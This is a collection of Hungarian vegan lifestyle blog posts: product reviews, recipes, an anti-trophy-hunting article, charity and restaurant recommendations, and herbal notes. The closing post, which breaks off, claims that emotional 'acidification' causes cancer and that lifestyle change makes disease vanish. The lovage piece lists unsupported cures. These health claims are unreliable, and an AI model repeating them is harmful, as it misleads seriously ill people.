gyerekbarát. A kölesgolyó pedig ilyen snack tartóba került. Könnyen megfogható, a fedele jól záródik, a gumis belső fedél nem engedi ki az ételt! Ez a legjobb funkció! Praktikus és könnyű a használata a gyerekek számára. Szintén BPA és PVC mentes. Mindegyik tároló többféle színben és állat figurával kapható, mindenki kiválaszthatja a számára leginkább tetszőt. Ezeken kívül kipróbáltunk egy puha, cuki úti takarót is, a baglyosat. A barátnőm kislánya, Emma vállalta, hogy teszteli és pózol a takaróval együtt. Kiválóan megoldotta a feladatot. A takaró egyébként párnaként is használható, ha összehajtogatjuk. A nagyméretű puha plüss anyaga meleget biztosít a gyerekek számára. Mosógépben mosható, BPA-mentes, PVC-mentes, ftalát-mentes. A Skip*Hop elérhető az alábbi linkeken: - weboldal - Facebook oldal Skip*Hop Magyarország és Monkie A termékeket a {Monkie} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! Közelgő Gyermeknap alkalmából pedig a SkipHop Magyarország felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Aki 2015. május 25 és 2015. május 28-a között vásárol Skip Hop, Yeominis, Stor it vagy Frank&Fischer márkájú termékeket a Monkie oldaláról az 10% kedvezményben részesül (a végösszegből kerül levonásra). Az akciós termékekre (ez is van jó néhány, szóval érdemes körülnézni) a kedvezmény nem vonatkozik. A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI10. Jó vásárlást mindenkinek!
Tökéletes reggeli: Eper banán smoothie
2015. május 20. Gréta konyhája
A jó dolgokra várni kell, és ilyen a friss magyar termelői eper is. Nem kell más hozzá csak egy napsütéses szombat reggel, 3-4 banán, 2 nagy marék friss, mosott eper, és kevés víz. 2 perc turmixolás, és ennyi a mennyország! Jó étvágyat!
Trófeának született - vadállatok, mint haszonállatok
Az emberiség történelmét végigkísérte a vadonélő állatok imádása, leigázása és megölése. Szépségük, különlegességük, cukiságuk, veszélyességük miatt kerülnek rács mögé vagy fegyverek célkeresztjébe. Számos mód kínálkozik arra, hogy tömegek élhessék ki az állatok számára súlyos következményekkel járó szenvedélyt. Többek közt állatkertek, vadasparkok, cirkuszok, delfináriumok, vadászatok. Bár a helyszín és az állatok változnak, a lényeg ugyanaz: az egyenlőtlen erőviszonyok megteremtése állat és ember között, az állatok kiragadása természetes élőhelyükről, szaporulatuk, viselkedési formáik kihasználása vagy megváltoztatása a profit érdekében, nem más, mint a haszonállat életciklusa. A canned hunt (konzerv vadászat), a trófea vadászat (szórakozásból ölés) egyik válfajaként ennek egy különösen kegyetlen és alantas módja. A prédaállatokat zárt, kerítéssel körbevett területen vadásszák - innen ered a név-, ahol esélyük sincs a menekülésre. Elsősorban az oroszlánszaporító iparágat hozzák összefüggésbe vele, de más vadászati formákhoz hasonlóan, minden állat veszélyeztetett, amely kereskedelmi értékkel bír. Íme, néhány terítékre kerülő faj: leopárdok, gepárdok, páviánok, orrszarvúk, vízilovak, zebrák, sakálok, elefántok, dámvadak, zsiráfok, hiúzok, antilopok, bivalyok, struccok, varacskos disznók, tigrisek. Mindenre lőnek, ami mozog. Az USA legalább 25 államában vadászhatnak egzotikus fajokra, de az üzlet a világ számos országában virágzik. Vadfarmok mellett cirkuszok, vadasparkok, szafariparkok és állatkertek is értékesítik közvetítőkön keresztül a kiöregedett állatokat vagy a fölösleges szaporulatot, vadászat céljára. Kerítés mögött - halálra ítélve 2005-ben John Lockwood Texasban webkamerák és távirányítható fegyverrendszer felhasználásával létrehozta az úgynevezett internet huntingot. Ez lehetővé tette, hogy a ,,vadászok a számítógép előtt ülve lőjék ki az állatokat (Click&Kill). Az állatvédő szervezetek mellett a fegyvertartást és a vadászatot támogató National Rifle Association és a Safari Club International is heves tiltakozásba kezdett. Végül 2008. augusztusában 40 államban betiltották a távirányított vadászatot. A bizniszben több közép és nyugat-afrikai ország, valamint Dél-Afrika is érdekelt. Ez utóbbi a zárt területen végzett vadászat Mekkája. Érdemes közelebbről megnézni, hogyan működik a rendszer. Közel 160 vadfarm szaporítja az állatokat. A fogságban tartott oroszlánok száma megközelíti a 8000 példányt, miközben a túlnépesedés miatt gyors ütemben zsugorodó vadonban mindössze 4000 állat él szabadon. A szerteágazó nemzetközi kapcsolatokkal rendelkező, maffia-szerű iparág a felnevelt szaporulatot elsősorban vadászat céljára adja el. Ezenkívül értékesít vadasparkoknak, állatkerteknek, magángyűjtőknek, és az egzotikus állatok feketepiacán a hagyományos ázsiai orvoslás illegális gyógyszerkartelljei is tőlük vásárolnak. A legjobb üzleteket azonban a vadászokkal kötik. Egy hím kilövése több mint 35.000 dollárt (10,6 millió Ft) is megér a trófea vadásznak (egy vadon élő oroszlán kilövéséért ennek a dupláját is elkérik). Dél-Afrikának 2012-ben 807 millió rand, durván 70 millió dollár bevétele volt a zárt területen végzett vadászatból. Az sem állítja meg a puskákat, ha a faj súlyosan veszélyeztetett, vörös listán van. Sőt, az ipar képviselői és az állatgyilkolás rajongói azzal védekeznek, hogy jobb ha a "stabilan szaporodó" tenyésztett állatok kilövésében élik ki a vadász szenvedélyüket, mintha a természetes vadállományt ritkítanák tovább. Turisták és állatvédők - vadászok szolgálatában A vadászat prédaállatait szállító farmok szaporítótelepként és szórakoztatóipari létesítményként funkcionálnak (akárcsak a többi, állatokat fogva tartó intézmény). Elzárt területeken tartják a szaporításra, eladásra, kilövésre szánt példányokat. Nem ritka, hogy a zsúfoltság és a beltenyészet miatt betegségek tizedelik az állományt. A látogatók elől rejtve zajlanak az állatkihasználás visszataszító mozzanatai, például a nőstény oroszlánok erőszakos megtermékenyítése, évi három alkalommal. A rácsok mögé születő kölyök nem a falkát, a faj genetikai variabilitását, az ökoszisztémát erősíti, hanem tulajdonosa bankszámláját hizlalja. Az önkéntes emberkézhez szoktatja a fehér oroszlánkölyköket. Nem lesz nehéz levadászni őket A kassza pedig gyakran csenget, ugyanis Dél-Afrika a világ 21. legnépszerűbb turista célpontja, GDP-jének 9%-a és minden 12. munkahely az idegenforgalomból származik. Turisták tömegei számára különleges attrakció a farmok kölyöksimogatója. Különösen kedveltek a kék szemű, fehér oroszlánok. A kölyköket néhány dollárért fényképezhetik, etethetik, kényeztethetik, sétáltathatják. A vadonban a természetellenes aktusért az életükkel fizetnének. Bár olcsó és ártatlannak tűnő szórakozás az állatok későbbi legyilkolásához képest, az oroszlánok vadászatra kondicionálása itt kezdődik el. Ahogy más haszonállatok esetén itt is tudatosan veszik el őket az anyjuktól rögtön a születésük után. A cél az, hogy megszokják az emberek jelenlétét. Mesterséges táplálékkal, cumisüvegből etetik őket, hogy erősítsék a kötődést. Gyakran konzervációs programként, vadvédelmi központként állítják be a tevékenységüket. Az ,,átpozícionálás tökéletesen működik. A kéthetes turnusokban érkező lelkes önkéntesek 2000-3000 dollárt fizetnek a felejthetetlen állatvédelmi élményért, miközben a vadászok számára szelídítik a későbbi prédát. A farmok az állatkihasználás mesterei, minden egyes dollárt kipréselnek az állatokból, mielőtt megölik őket. A vadonban ezért az életükkel fizetnének a fiatalok, de így csak néhány dollárba kerül Egzotikus, vadon élő állatok fogságban tartását és megölését támogatod, ha a canned huntot, vagy más vadászati formákat népszerűsítő, támogató utazási irodák, utazásszervezők, hotelek, vállalkozások szolgáltatásait igénybe veszed. Vadasparkokat, szafari parkokat, állatkerteket, állatos cirkuszokat, akváriumokat, delfináriumokat látogatsz. Vadhúst forgalmazó üzletekben, éttermekben, trófeával, állati testrészekkel kereskedő cégeknél vásárolsz. Állati bőrt, szőrmét viselsz, állati szöveteket tartalmazó ékszerekkel és használati tárgyakkal veszed körbe magad. Nincs kegyelem A canned hunt 100%-os sikert garantál a vadászok számára, ehhez azonban gondosan előkészített terepre van szükség. Nem elegendő, hogy a látszólag hatalmas és veszélyes állat fogságban született, emberhez szoktatott és szelíd. A sokszor dzsipek tetejéről pufogtató műkedvelők ,,közös ketrecbe zárják magukat a náluknál sokkal erősebb vadállatokkal, hogy azok véletlenül se menekülhessenek. A támadás kiküszöbölésére megpróbálják lekötni az egyébként alultáplált állatok figyelmét fákra aggatott élelemmel, túletetéssel. Az sem ritka, hogy erős nyugtatókkal szedálják könnyen vadászhatóvá őket, de a legextrémebb esetben szűk ketrecbe zárt állatokat lőnek agyon. A konzerv vadászathoz általában nem szükséges vadászengedély. Ritkán esik meg, hogy az állattal egyetlen lövés végez. A modern íjakkal, nagy kaliberű távcsöves puskákkal, számszeríjjakkal, kézifegyverekkel teleaggatott tapasztalatlan vadászok ügyetlensége miatt általában hosszú haláltusát vívnak az állatok. Ha valaki annyira ügyetlen, hogy el sem találja a prédát, akkor a mellé kirendelt "túravezető" lövi le az állatot. Családi idill meggyilkolt zsiráffal A leterített és immár veszélytelen vad mellett elkészülnek az első fényképek. Mindössze 3-4 hetet kell várnia a vadásznak, hogy az állat teste alkalmassá váljék a feldolgozásra. A taxidermia (preparálás) a vadászat virágzó melléküzletága, mely során a tetemet konzerválják, különböző trükkök segítségével szinte élővé varázsolják és a kívánt pózba merevítik. 2007-2012 között 47 db Dél-Afrikában kilőtt oroszlán trófeájára kértek kiviteli engedélyt magyar trófeavadászok. Időről-időre felbukkannak fotók a leölt állatokkal pózoló vadászokról, az interneten, de biznisz nem torpan meg a hangos tiltakozás ellenére sem. Sőt, évről évre mind több bevételt hoz a szaporítóknak, a preparátoroknak, a vadászati kellékek, vadászfegyverek gyártóinak, az ipart kiszolgáló hivatásos vadászoknak, az idegenforgalomnak és adók formájában az országnak, amely elnézi és támogatja a mészárlást. Bár egyes országok, mint például Ausztrália megtiltották az oroszlán testrészek importálását, az Európai Unió pedig korlátozza a nem fenntartható vadászatból származó trófea behozatalt, a canned hunt áldozatait ez sem védi meg az emberektől. Egyelőre ugyanis legális és fenntartható üzletnek tekintik.
1% segítség. De kinek?
Minden évben aktuális: kinek adjuk az adó 1+1%-ot? Sokan szeretünk olyan ügyeket támogatni, amik kapcsolódnak a veganizmushoz. Íme néhány megbízható szervezet, akiknek nagyon sokat segít az 1%-okból befolyt összeg. Az ado1szazalek.com oldalon minden szervezet adószámát megtalálod. Szervezetek A Philip Egyesület nemcsak kutyákat és a macskákat, hanem mindenféle állatot ment, és vezetőjük vegán. Kommunikációjukban is gyakran szólalnak fel a haszonállatként tartott állatok mellett. A Kutyatár Természet- és Állatvédő Egyesület is egy olyan vérbeli állatmentő szervezet, akik napi 24 órában rohannak, mentenek, erejükön felül és egyre többet. Minden tagjuk vegetáriánus vagy vegán. A Magyar Tengerimalac-védő Egyesület vezetői vegetáriánusok, de nyitnak a veganizmus felé. Idén ők rendezik a Kísérleti Állatok Világnapját, ahol vegán témájú előadással és infóasztallal segítik a veganizmus terjedését. Az Egészség-vár Alapítvány minden évben megrendezi a Vegetáriánus Fesztivált, ahol vegán témájú előadások, infóasztalok nyújtanak segítséget mindenkinek, aki érdeklődik a veganizmus iránt. A Zöld Fiatalok Egyesületnél jó helyre kerül az adód 1%-a, mert amellett, hogy tagjai vegánok és vegetáriánusok, a környezeti és emberi értékek mellett az állatvédelem is nagy hangsúlyt kap a tevékenységükben. Mindezek mellett pedig a Food Not Bombs pécsi különítményének adják a befolyt összegek egy részét. Vallási 1% A szervezeteknek szánt 1%-tól függetlenül adható egy vallási 1% is, melyet akkor is érdemes felajánlani, ha nem tudnk teljesen azonosulni egyik vallással sem. A Hetednapi Adventista Egyház tagjai évek óta tartanak vegán főzőtanfolyamokat, és ők maguk is vegánok, hiszen a Bibiliában az áll, hogy Isten az embereknek a növényeket és azok terményeit adja eledelül. A Magyarországi Krisna-Tudatú Hívők Közössége vegetáriánus szemlélet szerint él, egy részük vegán, és tagjai rendszeresen szerveznek ételosztást a rászorulók megsegítésére. A somogyvámosi Krisna-völgyben emellett egy hatalmas biogazdálkodás található. Segíts máskor is! Sajnos nem gyűjthet 1%-ot, de minden támogatásért hálás az alábbi három szervezet. Ha teheted, év közben is támogasd munkájukat adománnyal! Az Állatmentő Sereg vezetősége vegán, kiállnak minden állatért, és folyamatosan posztolnak vegán információs anyagokat az oldalukon. Még egy vegán szakácskönyvet is kiadtak. Emellett ők is azon lelkiismeretes szervezetek közé tartoznak, akik minden fillért az állatokra fordítanak. A Food Not Bombs nevű nem hivatalos szervezet tagjai kidobásra szánt, de fogyasztható ételekből és ételadományokból vegán ételeket főznek a rászorulóknak. Rendkívül hatékony, és ízig-vérig világmegváltó csapat. Fellépnek a túlfogyasztás, az élelmiszerpazarlás, és a nagyüzemi állattartás környezetterhelése, és a kirekesztés ellen. Étel- és pénzadományokat, önkénteseket is szeretettel látnak. A Vegán Állatvédelem Egyesület még csak most alakul, így 1%-ot nem gyűjthet, de rendezvényeinkre folyamatosan keresnek önkénteseket. A veganallatvedelem@gmail.com email címen tudod felvenni velük a kapcsolatot.
A zöldség, amiről még soha nem hallottál, pedig minden nap fogyasztanod kellene!
Okra - így hívják ezt a nagyon egészséges afrikai zöldséget, de emellett még bámiának, bhindinek, gombónak és quimbombónak is nevezik ezt a különlegességet, amely a trópusi és szubtrópusi égöv mentén terem. A mályvafélék családjába tartozik, amelyet Észak-Afrikában már több ezer éve termelnek, Magyarországon is már egyes helyeken, ha ritkábban is, de hozzá lehet jutni. Amerikába […]
Napfényes Fesztivál
Június első vasárnapján immár 12. alkalommal rendezik meg a Napfényes Fesztivált. Ezen alkalomból a szervezők először tartottak sajtótájékoztatót, hogy minél több emberhez, érdeklődőhöz eljusson a fesztivál híre. Az eseménynek az újonnan megnyílt csodás, végre nevéhez hűen Napfényes Étterem adott helyszínt, ízelítőt adva az étterem kínálatából is. A Fesztivál szervezői mindenkire gondoltak: egész nap izgalmas előadások és különleges koncertek, vidám szabadtéri gyermek- és felnőtt programok, valamint kézműves és biovásár várja a látogatókat. Az önismereti módszerek és alternatív terápiák iránt érdeklődők pedig 24-féle workshop és 35-féle egyéni természetgyógyászati konzultáció palettájáról választhatnak kedvükre valót, hogy kipróbálják azt. A nagyszínpadon idén is Magyarország legnevesebb holisztikus szemléletű szakemberei osztják meg bölcs gondolataikat a közönséggel az élet legfontosabb és mindannyiunkat érintő kérdéseiről: prof. dr. Bagdy Emőke pszichológus és pszichoterapeuta, Boldizsár Ildikó meseterapeuta, Tarr Bence László filozófus, kulturális antropológus és Váradi Tibor vallásbölcsész, természetgyógyász előadásai hangzanak el. A lelki-szellemi témájú előadások között különleges zeneélmények várják a fesztiválozás közben kicsit megpihenni vágyókat. A sztárvendégek Malek Andrea és Sasvári Sándor énekesek és Kövi Szabolcs fuvolaművész lesznek. A fesztivál záróakkordja a Misztrál együttes különleges koncertje lesz. A szabadtéri színpad a gyermekeké lesz. Itt varázslatos bűvészek, bábosok, zenészek és színészek szórakoztatják a legkisebbekből álló nagyérdeműt. Sok előadás interaktív, a nézők maguk is alakíthatják a műsort. Ezeken kívül a programot gazdagítja önismereti utca, festősátor, meseösvény, zenesátor, zsonglőrsátor, kézműves sátor, társasjátéksátor, hagyományok sátra, környezetvédelmi sátor és dúlasátor. Azt hiszem mindenki könnyen meg fogja találni a számára legfontosabbat, legérdekesebbet. Egy fesztiválon nem utolsó szempont a gasztronómia sem. Az ínycsiklandozó, tisztán növényi eredetű, vegán ételekről a Napfényes Étterem és Cukrászda fog gondoskodni, ahol a hagyományos ízek kedvelői és az új ízeket felfedezni vágyók egyaránt megtalálhatják majd számításaikat. Ajánlom mindenkinek szeretettel a fesztivált, ha igazi kikapcsolódásra vágyik, itt tényleg minden a testi-lelki-szellemi egészség jegyében fog zajlani. Érdekesség, hogy a Petőfi Csarnok valószínűleg utoljára telik most meg élettel. A fesztivállal lényegében búcsúzik a több évtizedes múltú rendezvényközpont. Lezárul egy korszak, jövőre új helyszínen várja vendégeit a Napfényes Fesztivál. Időpont: 2015. június 7., vasárnap Helyszín: Petőfi Csarnok (1146 Budapest, Zichy Mihály út 14.) Még több információ: a fesztivál weboldalán és Facebook oldalán. *** Fotó kredit: Napfényes Fesztivál
Hogyan édesítünk? Szirupokkal!
2015. április 28. Mindennapi ételeink
Fanni születése előtt sem használtunk fehér cukrot, csupán nyírfacukrot, vagy barna cukrot. Azóta amióta megszületett, az ő kásájába mindig csak szirup kerül, ill. amit így tudok édesíteni, csak ezzel édesítem. Milyen szirupokról van szó? A médiában a juharszirup a legelterjedtebb, pedig annyiféle szirup kapható és kóstolhat. Fanni kedvence a datolyaszirup. Ez datolyalé-koncentrátumot tartalmaz. Hihetetlenül finom, felér egy nutellával. Fanni hangos "még, még...nyamm" szavak kíséretében szokta megkövetelni:-) Ahogy meglátja az asztalon, ha bal lábbal is ébredt, felderül az arca (van még 1-2 ilyen étel:). Emellett amit szinte mindig használunk: Datolyaszirup: A szirupgyártás folyamata: a datolyát megfőzik, magtalanítják, a levét kipréselik, leszűrik és besűrítik. A színe sötétbarna, íze tipikus édes datolyaíz. Felhasználása: cukor és méz helyettesítésére. Édesítésre, keksz, müzli szelet, sütemény, szószok, joghurtok, szója alapú tej és desszert, fagylaltok, szörpök, italok készítésre. Szilvaszirup : A szirupgyártás folyamata: a szilvát megfőzik, magtalanítják, a levét kipréselik, leszűrik és besűrítik. A színe sötétbarna, íze tipikus édes szilvaíz. Rizsszirup: A gabonát lisztté őrlik. Víz és génmanipuláció mentes enzimek hozzáadása után adott hőmérsékleten elkeverik. Az enzimek a hosszú keményítőmolekulákat lebontják kisebbekké. Mechanikus szűrés során a nedvet elválasztják az oldhatatlan anyagoktól, majd melegítéssel besűrítik a szirupot, mely így csomagoláskész. Az elkészült szirupot különböző méretű tartályokba öntik. Agavé szirup: Az agáve a spárgafélék családjába tartozó pozsgás növény, sokféle faja van. Főként trópusi és szubtrópusi területeken nő. A különböző agáve fajták felhasználása széleskörű, ezekből nyerik például a tequilát, mezcalt is, fogyasztják sütve, levelének legkülső rétegét csomagolásra. A szirupot a növény nedvének besűrítésével nyerik. Tápióka szirup: A tápióka (más néven még manióka, kasszáva, mandióka) a kutyatejfélék családjába tartozik. Nagyon értékes a zöld, leveles része, a szirupot viszont a gyökeréből kivont keményítőlisztből készítik. Víz és génmanipuláció mentes enzimek hozzáadása után adott hőmérsékleten elkeverik. Az enzimek a hosszú keményítőmolekulákat lebontják kisebbekké. Mechanikus szűrés során a nedvet elválasztják az oldhatatlan anyagoktól, majd melegítéssel besűrítik a szirupot, mely így csomagoláskész. Az elkészült szirupot különböző méretű tartályokba öntik. Áttetsző, aranyos színű, édes ízű. Kkukoricamaláta-szirup: A kukoricamaláta-szirup kukoricalisztből és árpalisztből készül, természetes enzimek által. Világosbarna színű, enyhén malátás kukorica ízű. Árpamaláta-szirup: Az árpamaláta szirup árpamaláta-lisztből készül, természetes enzimek által. Sötétbarna színű, malátás, enyhén édes ízű. És íme, egy rövid cikk a szirupokat forgalmazó Biorganik-tól: "A gyümölcsök iránti ösztönös vágy, még mindig benne él az emberi testben. Mivel a természetben szinte csak a gyümölcs az egyetlen, ami édes, ezért az édes íz iránti vágy, valójában fő táplálékunk, a gyümölcsök iránti vágy. Mai étrendünkbe azonban nehéz annyi gyümölcsöt beilleszteni, amennyi fedezné édesség és szénhidrát iránti vágyunkat. A gyermekek ízérzéke tisztább és kifinomultabb még, mint a felnőtteké. Ösztönös igényeik is erőteljesebben jelentkeznek, mint felnőtt korban.Azontúl, hogy a fejlődő szervezetnek a szénhidrátok és az édes íz nem csak élvezeti értéket jelent, hanem a test fejlődéséhez is szükséges, ez a gyümölcsök iránti természetes igény is egy erőteljes mozgatórugó. Tehát ha a gyermekeink táplálékához egy édesítőszert szeretnék adni, akkor azontúl, hogy minél természetesebbet és organikusabbat keresünk, leginkább olyat érdemes választani, ami hasonlít a gyümölcsre. Néhány ilyen édesítőszer létezik a magyar piacon az aszalt gyümölcsökön kívül: az almaszirup, fügeszirup, datolyaszirup és a juharszirup. Ezek általában kicsit drágábbak, de ha pénztárcánk engedi, válasszunk ezek közül a gyermekeknek is. A juharszirup például azon túl, hogy édes és finom, nagyon sok pozitív hatással bír. Bővelkedik ásványi anyagokban, vitaminokban és aminosavakban, amelyek a kicsik növekedéséhez elengedhetetlenek. A juharszirup kálcium, kálium és magnézium forrás. Tartalmaz P-vitamint, B2 vitamint (riboflavin), B5 vitamint (pantoténsav), folsavat , B6 vitamint (piridoxin), Biotint és A-vitamint is...."
Végre! Vegán fine dining menüsor először Magyarországon a Babel Budapestben!
2015. április 22. Zizi kalandjai
Fotókredit: Babel Amikor emailben megkaptam a meghívót az ország első, vegán fine dining étlapjának a bemutatójára, a Babel Budapest étterembe, felugrottam az asztaltól és elkezdtem örömtáncot járni! Csoda történt… gondoltam! Nem is vegetáriánus, hanem vegán menüsort kínálnak a főváros egyik legjobb éttermében. Végre eljutottunk arra a szintre, hogy valaki bevállalja a vegán, ízben, textúrában és színben gazdag konyhájának a bemutatását. Igen, a Babel csapatának sikerül bebizonyítania, hogy tisztán növényi alapanyagokból, hústól, tejterméktől, tojástól és gluténtól mentesen is lehetnek az ételek változatosak és varázslatosan finomak. Hlatky-Schlichter Hubert, a Babel, a KIOSK és a Terasz tulajdonosa a vacsora folyamán elmondta, hogy ,,… a Babelben, csak úgy, mint a KIOSK-ban fontos számunkra, hogy egy igazi nagyváros sokszínű, urbánus igényeit folyamatosan szem előtt tartsuk-, így például a vegetáriánusokra, laktóz- és glutén érzékenyekre, cukorbetegséggel küzdőkre illetve egyéb ételérzékenységgel küzdőkre is gondolunk. Fontos, hogy olyan újdonságokkal szolgáljunk, melyek a törzsvendégeink és az újonnan hozzánk érkezők számára is érdekesek lehetnek. A minőségi vendéglátás a legfontosabb, bátrak és úttörők vagyunk és előremutató látásmódra törekszünk. A nemzetközi trendeket megfigyelve hazai értékeket teremtünk a gasztronómiában. A megújuló szezonális étlap mellett a vegán menüsorral most újabb szakmai kihívások elé nézünk. Célunk, hogy egy teljes értékű, és profi gasztronómiai élményt teremtsünk a vegán konyha rajongóinak, de biztos vagyok benne hogy húskedvelő vendégeknek is nagy élmény a most debütáló extra vegán étlap. Fotókredit: Babel Izgatottan érkeztem a vacsorára és a finom ételeken kívül az est fénypontját emelte, hogy az ültetésnek köszönhetően fantasztikus asztaltársakra leltem. Íme az ízekben gazdag bolygóra repítő menüsor, amelynek különlegessége, hogy a megszokott borpárosítás helyett az ételekkel harmonizáló juice-kat szolgálnak fel: Málnás paradicsom esszencia Emlékeztem rá, hogy a tavalyi Gourmet Fesztiválon már kóstoltuk és készek voltunk tőle. A paradicsom íz dominál, de a belepottyantott málnaszem és a mentalevél izgalmassá és frissítővé teszi az esszenciát. Uborkahab Könnyed, enyhén sós, igazán beindítja az ízlelőbimbókat. Gin & Tonic Granita Jó lezárása az üdvözlő falatoknak. Hűsít és édes, felkészít a nagyobb fogásokra. Fotókredit: Babel Quinoa saláta pácolt zöldségekkel – spárga, édeskömény, grapefruit juice Pont quinoát ebédeltünk ezen a napon, de mivel imádom, így nem volt gond ennek a csodaszép, színes, szemet gyönyörködtető fogásnak az elfogyasztása. A quinoára pakolt zöldségek nyersek, de a pácnak köszönhetően nem érezzük azt, hogy nyuszik vagyunk és nyers zöldségeket ropogtatunk már egy ideje. Ez is a könnyed, vidám, fantáziadús kategóriába tartozik, amelyet kiemel a spárga, édeskömény és grapefruit juice. Eddig nem jutott eszembe, hogy spárgát dobjak a zöldség- és gyümölcscentrifugánkba, de ha a spárga ára kedvezőbb lesz biztosan ki fogom próbálni én is… mondjuk eperrel párosítva. Citrusos karalábékrémleves – kápia és málna juice Megfelelően savanykás, hihetetlenül krémes leves, olyan az állaga és az íze is, mintha tejszínnel lenne selymessé varázsolva, pedig nem. Uborkával megfestett és ízesített tápiókával, sáfránnyal és sós kesudióval van tálalva. Finoman érződik a karalábé íze is, amelyet a kápia és málna juice még inkább kiemel. Fotókredit: Babel Zelleres ravioli petrezselyemmel és kávés endíviával – eper és rebarbara juice Gluténmentes, rizslisztból készült zellerkrémmel töltött ravioli és még sok-sok finomság a tányéron: tempurált ropogós zöldségek – karfiol és spárga, előbukkant cukkini is, valamint a kávés endívia, mindezek krémes petrezselyem “ágyon” tálalva. Sok-sok íz keveréke, amelyek jól megférnek egymás mellett. Számomra egyedül a kávé íze volt szokatlan, de mire a végére értem, egészen megszoktam a kávé endívia párosát. Persze az eper és rebarbara juice megint bebizonyította, hogy milyen jó, ha ezt a két gyümölcsöt összeeresztjük. Nagyon jól kiegészítették a sós, kávés ízvilágot. Fotókredit: Babel Görögdinnye sorbet angolzellerrel Ez már az a fogás volt, amikor úgy éreztem, hogy a vacsora éppen véget is érhetne, mert jól laktam. Frissítő, könnyed görögdinnye sorbet, számomra szokatlan ízkombinációban az angolzellerrel. Szokatlan, de hihetetlenül finom a kettő együtt. Próbáljátok majd ki a nyáron… egyetek görögdinnyét és rágcsáljatok mellé szárzellert. Fotókredit: Babel Tökfőzelék hamis fasírttal – kiwi és petrezselyem juice Gondoltam, hogy nem a hagyományos tökfőzelékre kell gondolni, hanem valami újított verzióra… és így is lett. Külön kis tálkában kaptuk a nagyon finom, savanykás, krémes állagú főzeléket, a nagy tányéron pedig friss tökforgácsokkal, cukkinivel, kevés kaporral tálalva a hamis fasírtot, ami adzuki babból készült és a hagyományos magyaros paprikás hagymás fasírtra emlékeztető ízével jól passzolt nagyon a főzelékhez. A juice-ból a kiwi íze az erőteljesebb, de finoman érezhető a petrezselyem is. Mandulás kókuszfagylalt aszalt gyümölcsökkel – kókuszvíz és chia mag Amikor már azt hittem, hogy tényleg nem fér több belém, akkor szolgálták fel a desszertet. Enyhén roppanós mandulás burok, benne az éppen édes kókuszfagylalt szárított mangóval és eperrel, valamint friss gyümölcsökkel (eper és áfonya). A kókuszfagylalthoz jól passzolt a kókuszvíz, a benne lévő chia mag különösebb élményt csak látványban nyújtott. *** Fantasztikusat alkotott a Babel csapata, professzionális munkát végeztek; külön hála és köszönet Lőrincz Györgynek, a séfnek, aki elmondása szerint a francia konyhán (vaj, tejszín) nőtt fel, tehát igazi kihívás volt számára ezt a vegán, gluténmentes menüt összerakni ilyen kreatívan. Remélem ezzel a menüsorral egy sorozat indul el és egyre több magyarországi étteremben fog egyre több vegetáriánus és vegán étel (esetleg teljes menüsorok) megjelenni az étlapokon. Hajrá! A teljes menüsor ára 19 500 Ft/fő + 3500 Ft juice párosítás és május 5-től lesz elérhető. Nem olcsó, de különleges alkalomra (születésnap, évforduló) spórolva érdemes kipróbálni. Vegetáriánusoknak, vegánoknak kötelező, húsevőknek erősen ajánlott! Babel Budapest 1052 Budapest Piarista köz 2. Weboldal Facebook
Lestyán, a "Maggi" fűszer
2015. április 20. Éltető ételek
A lestyán (Levisticum officinale) nemcsak fűszernövény, hanem kiváló gyógynövény is. Eredetileg Perzsiából származik, de Európában, Észak-Afrikában és Oroszországban is elterjedt. A középkori Magyarország népszerű fűszere volt, és a népi orvoslás is nagy becsben tartotta. Illatra és ízre emlékeztet a zeller levelére, ezért hamis zellernek is nevezik. 1-2 méter magas, évelő növény, húsos gyöktörzse van. Sárga virágzata 5-15 sugarú, összetett ernyő, amely július-augusztusban nyílik. Termése sárgásbarna, szárnyalt, kettős kaszat. 3-5 év alatt fejlődik ki teljesen. Felhasználása gyógynövényként Drogja a gyöktörzse, a leveles szára és a termése. A leveleit mindenképp a virágzás előtt gyűjtsük, mert utána keserűek lesznek. Alkalmazása: - étvágyjavító, epekőoldó, emésztésserkentő; - vizelethajtó, húgykőoldó; - antibakteriális, antifunginális, nyugtató; - köptető, segíti a nyálkás váladék kiürülését; - fájdalomcsillapító, görcsoldó (pl. menstruáció, fejfájás, köszvény esetén). Lestyán mint fűszernövény Levesek, főzelékek, saláták kedvenc növénye lehet. Magját péksüteményekbe szórják, rizsételekhez adják. Likőrök, röviditalok előállításához is felhasználják. Gyökerét lehámozva zöldségként használhatjuk. Maggi fűszernek is nevezik az illata miatt, annak ellenére, hogy nincs is benne. A Maggi cég a múlt század elején törvényes úton tiltotta meg a kertészeknek, hogy a lestyánt maggifű néven árulják. A boszorkánykonyhában számos ötletet találhatunk a lestyán felhasználására, mind a gyökeret, a magot és a levelet tekintve. Készíthetünk zöldséglekvárt "házi vegetát" is, amelyben fontos összetevő a növény levele.
A "rákgyógyító" terápiánk
2015. április 18. Vegan Spirit
Édesapám történetéről már olvashattatok itt: http://veganspirit.blog.hu/2015/04/14/legyozi_a_rakot_a_nyersvegan_eletmod Most azt a terápiát osztom meg veletek, amit ő használ. Lelki okok: Minden betegésgnél, így a daganatos betegségek kezelésénél is nagyon fontos a lelki okok felkutatása, megértése, és elengedése! A felkutatásban az internet és önmagad ismerete, valamint a magunkhoz való teljes őszinteség segíthet. A feldolgozásban és elengedésben pedig a világ és önmagunk teljes elfogadása valamint a feltétel nélküli megbocsájtás és hála. Mindent olyannak elfogadni amilyen, és azért szeretni amiért olyan amilyen! Máskülönben a negatív érzelmi állapotok is a test folyamatos savasodását okozzák, ami ellen a testünknek egyfolytában küzdenie kell. Ez egyrészt leköti az immunrendszerünk kapacitásának jelentős részét, másrészt a savas közeg kedvez a ráknak és más betegségeknek, ami együtesen már sok a legyengült fizikai és érzelmi állapotú test számára! Az elsavasodást egyrészt a bevitt italok és ételek, másrészt a negatív érzelmi álllapot és az ahhoz kötődő gondolatok okozzák! Ezeket mind meg kell szüntetni. Nem szabad félni a jövőtől, hiszen minden betegség csak jelzés. Pontosan azért vannak ezek a betegségek, hogy jelezzék, nem azon az úton járunk, mely lelkileg és testileg számunkra élhető és ideális. Pusztán azt jelzik, hogy az, ahogyan eddig éltünk, az biztosan élhetetlen a jövőben. Ha megértjük ezt a jelzést, és az intésnek megfelelően változtatunk életmódunkon, gondolatainkon és érzelmeinken, akkor a betegség/jelzés okafogyottá válik és eltűnik. A lelki okok 